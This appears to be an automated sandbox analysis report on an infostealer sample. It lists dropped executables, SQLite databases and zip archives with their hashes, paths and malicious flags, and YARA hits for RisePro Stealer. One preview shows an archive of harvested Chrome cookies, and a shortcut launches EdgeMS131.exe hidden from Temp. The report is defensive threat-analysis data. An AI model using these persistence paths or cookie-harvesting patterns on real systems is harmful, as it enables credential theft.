                                                                                                                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):3001856
                                                                                                                                                                                  Entropy (8bit):7.9902601078319515
                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                  SSDEEP:49152:fBAdrMlL5e9wo9gMj0rnjBzhDqRBsFhU186LnFrq/OdncDhIYaMFEFT:KtJwogMYDll+R6FhtYdEwnW+YaMFqT
                                                                                                                                                                                  MD5:A19B05B874E77B99515C397C5DE13F48
                                                                                                                                                                                  SHA1:6996028DDF12116E8BB0FBCD5FA693DE0E14B78A
                                                                                                                                                                                  SHA-256:C6DC8E17A1D4A1545A12027D8FB15A2C625CE3781CD2062976861CEBAAE37A9A
                                                                                                                                                                                  SHA-512:4E0B6AA347062911D76DD6C6D575FD82CFA7F2C8C0A308967E77DC1ABDA2C7E14DFD0942869BDDD59E800359490FD2FC1AF08FFCD466428347473E20136001A4
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..................PE..L...N@.e...............".....`......$............@......................................@... .. .... .. .......... `.......l..x....0..h....................`.......................................................................................................4..................@............p......."...8..............@............@...0.......Z..............@............0...p.......b..............@....................d...b..............@....rsrc....0...0...0..................@..@..........x..`...(..................@....data.....!..0....!.................@...................................................................................................................................................
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1755136
                                                                                                                                                                                  Entropy (8bit):7.944061716574701
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:4+5L+Qg75yHWPUqbVpWlBRd1jcOHmf0FqSoYR2DPoWq:4+dFHWPS/Rd1IY4hoV
                                                                                                                                                                                  MD5:FA2940984475E3DD89E37F15DBE8A88F
                                                                                                                                                                                  SHA1:C7CFA3A0F500441CE22EF72BBD9BE7988F07C4D3
                                                                                                                                                                                  SHA-256:04BA7F7A64595085447F1D659F91D98693E53333F323EC7826A0E0D03918B626
                                                                                                                                                                                  SHA-512:C30C965067519BF3B172362AA5DF510FE867CAFE14BED875049F984B18018801119BD334B4ED49ED63E93D11F2A4C8D2397024D41328471E842445497B43F49C
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....$e.........."...0..$............E.. ...`....@.. ........................F.....}H....`.................................m........`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........6..............@... ..*..........8..............@...odmizeae.....@+......:..............@...wjrksujl. ....E.....................@...................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                  Entropy (8bit):1.1239949490932863
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):155648
                                                                                                                                                                                  Entropy (8bit):0.5407252242845243
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                  Entropy (8bit):0.8508558324143882
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                                                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                                                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                                                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                                                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):155648
                                                                                                                                                                                  Entropy (8bit):0.5407252242845243
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1882112
                                                                                                                                                                                  Entropy (8bit):7.949517224812261
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:wLi2wNaeFSEYrdH8UesU02hUv21QLUmRa2obb:oHnDEYrPW0cUvCmz+b
                                                                                                                                                                                  MD5:2C4C8C25D448625A0184403CA56EDB2D
                                                                                                                                                                                  SHA1:61531D43B5ADE8F66FD2409DF1A20902EF1A781E
                                                                                                                                                                                  SHA-256:01024AF50DDAF78F4F6A96B4E537400D4572A47E60CCF542F9EE6771DCDBAC0F
                                                                                                                                                                                  SHA-512:CCF51E10D1AAE0F669B771669F67500E1B7EE712A5078B947D256B57E722244F11F01B018820C4B53D1069137F5F4859E3353D8BE601F4E80AC1ECF939F30368
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                  Entropy (8bit):1.1239949490932863
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):917504
                                                                                                                                                                                  Entropy (8bit):6.5798614215687845
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:MqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDgaKTx:MqDEvCTbMWu7rQYlBQcBiT6rprG8aax
                                                                                                                                                                                  MD5:CBE3CA8AEB654F541B59B3F97C0C9492
                                                                                                                                                                                  SHA1:C775259EB2B550BA7A9C49A12138562D9753D450
                                                                                                                                                                                  SHA-256:11E7D4527918A37E28F345ACF4A6E6AE7665D7D204543232E9400F92C58CB367
                                                                                                                                                                                  SHA-512:C0987C12B294CF37FF40F45EFF08F32A3A7F806B6A3C968832C5A2A44AEAE92AF32F229A8C5D5B60C806C8B6FC9AB1C411EC45C18AFC4D4F4675ED73F4B8E186
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                                  Entropy (8bit):2.5654483718208256
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:L3Be:LBe
                                                                                                                                                                                  MD5:765FB18596CFD4E5EF217F12988E89FD
                                                                                                                                                                                  SHA1:9B990CE578B82FF3B1AF9894505810C2EE89E4E7
                                                                                                                                                                                  SHA-256:F39AF5B21139730740B0B11688D0C79E37FB24674C99F129D907D27325CE4608
                                                                                                                                                                                  SHA-512:CE9F13E5730AD59AB6D18919F4164421013A1F1D3C4C6CE4EA73E239CD53E48B7FC146485C5A32EC23B417983400A9722D0765A91514DAF69A4E77BA7E66252F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:1708519397797
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2765
                                                                                                                                                                                  Entropy (8bit):7.727314565331455
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:9uawXZV//QWGPvcVrXi5tV12YGCCsMZKCwsapcLrn3KJ6WkZOzc/Lw:qZV//Q1vcVO5tagDMNBear3KJy/s
                                                                                                                                                                                  MD5:F75071F8AEC67A41AAAA55F9FD82EE12
                                                                                                                                                                                  SHA1:265E5DD15F4A9C7679429EEA6477C0F6D0A1BA15
                                                                                                                                                                                  SHA-256:5D9472B19B24BA8C7B57D61F90C093B605BD3E746A14C629F3FD7A71C7680E8D
                                                                                                                                                                                  SHA-512:43DD8B6B321233C8C585A0B20EA5AB1DC44C95EF3FA1ED34152C594669FE372485EF573734C0080BF99816F01315F1386AFA478E43E2E72E866F2E8347FEFA0B
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                  • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: C:\Users\user\AppData\Local\Temp\tYPDz_TYm0NTu0Y5ud8z_nO.zip, Author: Joe Security
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):491284
                                                                                                                                                                                  Entropy (8bit):7.997725234203649
                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                  SSDEEP:12288:u8fhrUPE5+8TK1g9M6y5JJtuiA50eHgB2rAnavTQu:fZrUPE5I1g9M6yyZ0AgYra4Z
                                                                                                                                                                                  MD5:09372174E83DBBF696EE732FD2E875BB
                                                                                                                                                                                  SHA1:BA360186BA650A769F9303F48B7200FB5EACCEE1
                                                                                                                                                                                  SHA-256:C32EFAC42FAF4B9878FB8917C5E71D89FF40DE580C4F52F62E11C6CFAB55167F
                                                                                                                                                                                  SHA-512:B667086ED49579592D435DF2B486FE30BA1B62DDD169F19E700CD079239747DD3E20058C285FA9C10A533E34F22B5198ED9B1F92AE560A3067F3E3FEACC724F1
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2787
                                                                                                                                                                                  Entropy (8bit):7.731347265624247
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:9ZaMXZV//QWGPvcbptFv4jvf5zbPI7kn9tnwuWiXfA0mRrxRzlW6n3KJ65kVOE9G:XZV//Q1vcb3FIXN1vwqLmnJ3KJm
                                                                                                                                                                                  MD5:0D4F5825B2D914C1A07A36E41A70BCA7
                                                                                                                                                                                  SHA1:BB60A108BC941784B7CD5EBC0B984B8901F5C5BB
                                                                                                                                                                                  SHA-256:4509D43DAE35308285049438268F2C2949CB6402DE1DA916036DA36888252B21
                                                                                                                                                                                  SHA-512:B588AE2D88638F53B505CBB10C936123E0B4D8E508DC4B2819653ACE27BE72B86914C03776AD85FB99BEED537BD9C0CEA3FBEB4BC05C290092FEF9DE659B931F
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                  • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: C:\Users\user\AppData\Local\Temp\up45CFBz_Ai1CiBRyRFsyfp.zip, Author: Joe Security
                                                                                                                                                                                  Preview:PK.........cUX................Cookies\..PK.........cUXA.`%............Cookies\Chrome_Default.txt....@.........i.&h.Cn..L...\.FA@.~..v7..O...%!es.f..../S..a...@.,ek.%.H......</<2..,...I..w......1q.f.F+PiM.=h.5..2....0....O..u_.~}Z.UM........y...Rj..4H..D...xLY@....[.d.c&......G_............j%q%....Y.|.....P...u..u..85/..Z`...-..c...^A8n...Y.3......j.G!....c.....AM@!._W.yQbs.@.....h.y.-......|J..i...r....c....M...E...GS...C....X..C.U..v.%......C,.L0,......5.=....6.....PK.........cUX..1;h...........information.txt.X.r.H.}.....}.+.2wI<....MH(..$.>.i..ua%a.n.ok..2bR.W...>.3.U.D}...}..\.....#..n.4.T..........~...b.;#..g..|E..)...2.q...,.f=.0!3.EXv;.........'I...Q....yX*9.._.....M.Zp......Ny..(.s"x-.*.u...A.n\."H!..n4.8..F.?..Q..M^<....J..Ne.HC.w'...9...n...]..35JH&=V.o.}..b.....C....E....]M~G_..}.=......Y..K.....F.+..H.W.3...R......p..P.:..h.".$..I...U.'..#....(..s.-V.Bo.....'.4.".k ..l...=:......)..Q.....UM....uX....k......y....p....:(...Y..,s..
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Wed Feb 21 10:29:32 2024, mtime=Wed Feb 21 10:29:32 2024, atime=Wed Feb 21 10:29:26 2024, length=1882112, window=hide
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1193
                                                                                                                                                                                  Entropy (8bit):4.912610916137459
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:8FhmgD4+lXaoXyRBgKSKD8A0GajO9p4aBqygm:8vHDVlJCRsKfajwMyg
                                                                                                                                                                                  MD5:ECC5D2501ED98CEA48C66A0E25805295
                                                                                                                                                                                  SHA1:7399588706A17DC241D7090C9201F42F80E6E75A
                                                                                                                                                                                  SHA-256:2DEA535E1612FF12BDB6BA9D6019E348F4CF3699BCEF65CDB54D80CA9A99CC56
                                                                                                                                                                                  SHA-512:86BDB39DA60EA0413ECFFD71BFE8996DE0BBE48885AC150D9474DC9AD120310423B16B632B661CA29613B114AB1EE2D9C6B5B4BE113B6C6695309E0EE3C23578
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:L..................F.... .....a=.d..d.e=.d..[.,:.d.......................... .:..DG..Yr?.D..U..k0.&...&.......$..S...._.#.d.....4.d......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2UX.[...........................^.A.p.p.D.a.t.a...B.P.1.....UX.[..Local.<......EW<2UX.[....[.....................V]/.L.o.c.a.l.....N.1.....UX.[..Temp..:......EW<2UX.[....^.........................T.e.m.p.....\.1.....UX.[..EDGEMS~1..D......UX.[UX.[.....@........................E.d.g.e.M.S.1.3.1.....h.2.....UX.[ .EDGEMS~1.EXE..L......UX.[UX.[.....A.......................E.d.g.e.M.S.1.3.1...e.x.e.......k...............-.......j............N.^.....C:\Users\user\AppData\Local\Temp\EdgeMS131\EdgeMS131.exe....E.d.g.e.M.S.1.3.1.4.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.M.S.1.3.1.\.E.d.g.e.M.S.1.3.1...e.x.e.........|....I.J.H..K..:...`.......X.......571345...........hT..CrF.f4... ....w.....-...-$..hT..CrF.f4... ....w.....-...-$.............1SPS.XF.
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):4419
                                                                                                                                                                                  Entropy (8bit):4.929873368056398
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:gXiNFS+OcPUFEOdwNIOdwBjvYVbsL+z8P:gXiNFS+OcUGOdwiOdwBjkYL+z8P
                                                                                                                                                                                  MD5:285F12DDB6C391575D0B1C063304B4EF
                                                                                                                                                                                  SHA1:698AEABD59D43336047005BDC3AC7122B5FE3630
                                                                                                                                                                                  SHA-256:A9EF7E4F8E62409EE4C7CE93A4989596161ABDF1DE9667C5946155E910AC6B0D
                                                                                                                                                                                  SHA-512:0F182656B0BAF9EED589A805C530F62B099D968B0A8D8D6CA1541D8F441F097F6F265907A67503EBDBD1A7BB5A71F58AB4AFD7CBA17A6AD34DBE6F8C6C6C458C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"bookmarks-toolbar-default-on":{"slug":"bookmarks-toolbar-default-on","branch":{"slug":"treatment-a","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pre-95-support"},"features":[{"value":{"enableBookmarksToolbar":"always"},"enabled":true,"featureId":"bookmarks"}]},"active":true,"enrollmentId":"d48f64a8-a4ab-4cdd-a650-4b386e41a201","experimentType":"nimbus","source":"rs-loader","userFacingName":"Bookmarks Toolbar Default On","userFacingDescription":"An experiment that turns the bookmarks toolbar on by default.","lastSeen":"2023-10-05T06:20:35.557Z","featureIds":["bookmarks"],"prefs":[{"name":"browser.toolbars.bookmarks.visibility","branch":"user","featureId":"bookmarks","variable":"enableBookmarksToolbar","originalValue":null}],"isRollout":false},"csv-import-release-rollout":{"slug":"csv-import-release-rollout","branch":{"slug":"enable-csv-import","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pre-95-s
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:1
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:Mozilla lz4 compressed data, originally 22422 bytes
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):5308
                                                                                                                                                                                  Entropy (8bit):6.599374203470186
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:z2YbKsKNU2xWrp327tGmD4wBON6h6cHAHJVauvjZHjkTymdS1/qTMg6Uhm:zTx2x2t0FDJ4NpkuvjdeplTMohm
                                                                                                                                                                                  MD5:EB56C2F4DA9435F3D5574161F414CD17
                                                                                                                                                                                  SHA1:74A8FC3EC0559740FD9D835B638354985E2DEAB6
                                                                                                                                                                                  SHA-256:394E803D5FF8E156DFA7D15E96B51A683F4624A1BCF88EAA532399AC2C9B0966
                                                                                                                                                                                  SHA-512:DF90568D191C757392FB85BDDA5333C7FE7E3BB370C5DE8C50DD810B938D732E39B5608FB4494CAADAE99E1601989FDFC0FEBDCF70F27FFE581F904170A81E0F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:mozLz40..W....{"app-system-defaults":{"addon....formautofill@mozilla.org&..Gdependencies":[],"enabled":true,"lastModifiedTime":1695865283000,"loader":null,"path":s.....xpi","recommendationStateA...rootURI":"jar:file:///C:/Program%20Files/M.......refox/browser/features/...... !/...unInSafeMode..wsignedD...telemetryKey..7%40R...:1.0.1","version":"..`},"pic..#in.....T.n..w...........S.......(.[......0....0"},"screenshots..T.r.....[.......(.V....-39.......},"webcompat-reporter...Ofals..&.z.....[.......(.]....=1.5.............<.)....p....d......1.z.!18...5.....startupData...pX.astentL..!er...webRequest%..onBefore...[[{"incognitoi.UtabId..!yp...."main_frame"],"url...."*://login.microsoftonline.com/*","..@us/*L.dwindows...},["blocking"]],...Iimag...https://smartT.".f.....etp/facebook.svg",...Aplay*....8`script...P.....-....-testbed.herokuapp\.`shims_..3.jsh.bexampl|.......Pexten{..Q../?..s...S.J/_2..@&_3U..s7.addthis . ic...officialK......-angularjs/current/dist(..t.min.js...track.adB...net/s
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):24
                                                                                                                                                                                  Entropy (8bit):3.91829583405449
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:YWGifTJE6iHQ:YWGif9EE
                                                                                                                                                                                  MD5:3088F0272D29FAA42ED452C5E8120B08
                                                                                                                                                                                  SHA1:C72AA542EF60AFA3DF5DFE1F9FCC06C0B135BE23
                                                                                                                                                                                  SHA-256:D587CEC944023447DC91BC5F71E2291711BA5ADD337464837909A26F34BC5A06
                                                                                                                                                                                  SHA-512:B662414EDD6DEF8589304904263584847586ECCA0B0E6296FB3ADB2192D92FB48697C99BD27C4375D192150E3F99102702AF2391117FFF50A9763C74C193D798
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"schema":6,"addons":[]}
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 9, database pages 7, cookie 0x5, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):229376
                                                                                                                                                                                  Entropy (8bit):0.826292767054668
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:Sb1zkVmvQhyn+Zoz672NdZ60ubZIkA333JwMMUNlBN80/LKXVZGZjxmWt:SbpCMr1CRm
                                                                                                                                                                                  MD5:36A13021EDAA8A920D4656538972287D
                                                                                                                                                                                  SHA1:97D2E5C0A40FBD6EB6A6046331364BBF0F5AFCBD
                                                                                                                                                                                  SHA-256:186332EE39B7353B73E4AB3054FB4CC45D496254F54F3FE0209170188A3CB688
                                                                                                                                                                                  SHA-512:07C51DA717E7B722F1B863D1A48E05AEF776D290028D0BB4A5E0B5021389347AD4D09E9F14B8D0B74381DD0F710A52E706BCA697B9CD0351B84EDA9332812797
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):229944
                                                                                                                                                                                  Entropy (8bit):0.7381651550224085
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:7tWMjcA333JwMMUNlBN80/LKXQX1zkVmvQhyn+Zoz67K:QMr1CRGT
                                                                                                                                                                                  MD5:31177C581DDDAE0FA54D429A419EE110
                                                                                                                                                                                  SHA1:5DEEC02BCF23BB9BD0AE894DEE77FACD759D21C0
                                                                                                                                                                                  SHA-256:08D92F22AA8BA856357347CA25CA97E5826B9C0A90F14601607E7546503F8F04
                                                                                                                                                                                  SHA-512:6312F7B32566A5BDB5414E8D46F7B3F2DD520999080FDDB07ABAE2E75085F59E0B4FD1FA19FF3648374EE0E9F8AA6AA22F4C353EF7594B8FA69F102380734BF1
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):33288
                                                                                                                                                                                  Entropy (8bit):0.3089303537473895
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:7+tv6LCvwae+Q8Uu50xj0aWe9LxYkKA25Q52:7Mv6awae+QtMImelekKDa52
                                                                                                                                                                                  MD5:D515B02AA6D943DCA3EC456FF2A23237
                                                                                                                                                                                  SHA1:9651D372C8E1929C26B31BE02D9F9796E08A608C
                                                                                                                                                                                  SHA-256:DBC0ECE9F66BBA31412A74BD2D962772902545711B0B66F2D199D4D70C2B5EDE
                                                                                                                                                                                  SHA-512:275732DB73FA380FA71F959CF9850CCCA92BCD7F852324229EEA535271C4C1D23E721E754B2B64F5E7A89452A520A5DD000417884E23A60EA65FC7B199786A1B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:Mozilla lz4 compressed data, originally 56 bytes
                                                                                                                                                                                  Category:dropped
